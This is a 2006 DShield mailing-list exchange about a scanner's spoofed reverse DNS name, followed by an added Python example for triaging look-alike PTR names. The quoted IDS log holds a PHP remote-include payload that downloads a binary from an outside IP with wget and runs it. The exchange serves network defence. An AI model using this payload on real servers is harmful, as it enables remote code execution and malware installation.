[Dshield] Reverse name

TheGesus thegesus at gmail.com
Mon Mar 20 16:13:20 GMT 2006


On 3/18/06, DigitalNation <dshield at digitalnation.ca> wrote:
> Check out the RV DNS name of this IP (64.62.190.68) that is probing for a
> PHP cross scripting hack:
>
> 64-62-190-68.cave-18.dialup.torabora.bin-Iaden.com
>
> Here is some of the script so you won't think I am BS'ing you:
>
> ---------------------------------------------------
> HTTP_PHP_Includedir, 64.62.190.68,
> 64-62-190-68.cave-18.dialup.torabora.bin-Iaden.com, 64.x.x.x, ,
> URL=/webcalendar/send_reminders.php&arg=includedir%3Dhttp://83.16.187.6/cmd.
> dat?%26cmd%3Dcd%2520/tmp;wget%252083.16.187.6/haita;chmod%2520744%2520haita;
> ./haita;echo%.....
> ----------------------------------------------------
>
> Ha!! Nice...."torabora.bin-Iaden.com"

That's not an el, that's a capital "i" (in "bin-iaden.com").

Interesting DNS spoof.  No record of bin-iaden.com, although
bin-laden.com exists.
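
The check described in this reply, as an added example that is not part of the original post: lower-case the PTR name (DNS names are case-insensitive), compare it against a watchlist by look-alike skeleton, and test whether the name resolves forward to the probing IP. The function names, the watchlist and the stub resolver are assumptions made for illustration; the stub's empty answer is constructed to mirror the "no record" observation above.

```python
# Added example: triage of a reverse-DNS (PTR) name reported in an IDS alert.
# Characters that are easy to mistake for one another in common fonts,
# applied after lower-casing (so a capital "I" is already "i" here).
CONFUSABLE = str.maketrans({"i": "l", "1": "l", "0": "o"})

def normalize(name):
    """DNS names are case-insensitive: compare lower-cased, without the root dot."""
    return name.rstrip(".").lower()

def registered_domain(name):
    """Assumption: the last two labels are the registered domain (no public-suffix list)."""
    return ".".join(normalize(name).split(".")[-2:])

def skeleton(name):
    """Collapse look-alike characters onto one representative."""
    return normalize(name).translate(CONFUSABLE)

def triage_ptr(ip, ptr_name, watchlist, resolve):
    """Return the normalized domain, any watched names it imitates, and whether
    the PTR name resolves forward to the same IP (forward-confirmed reverse DNS)."""
    domain = registered_domain(ptr_name)
    lookalike_of = [w for w in watchlist
                    if normalize(w) != domain and skeleton(w) == skeleton(domain)]
    forward_ips = resolve(normalize(ptr_name))
    return {
        "domain": domain,
        "lookalike_of": lookalike_of,
        "forward_confirmed": ip in forward_ips,
    }

def stub_resolve(name):
    """Constructed offline resolver: no forward records exist for any name."""
    return []

if __name__ == "__main__":
    print(triage_ptr(
        "64.62.190.68",
        "64-62-190-68.cave-18.dialup.torabora.bin-Iaden.com",
        ["bin-laden.com"],   # hypothetical watchlist
        stub_resolve,
    ))
```

In live use, `resolve` would wrap a real lookup such as `socket.gethostbyname_ex` and return its address list; a PTR name that fails forward confirmation is controlled only by whoever runs the reverse zone for that address block.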
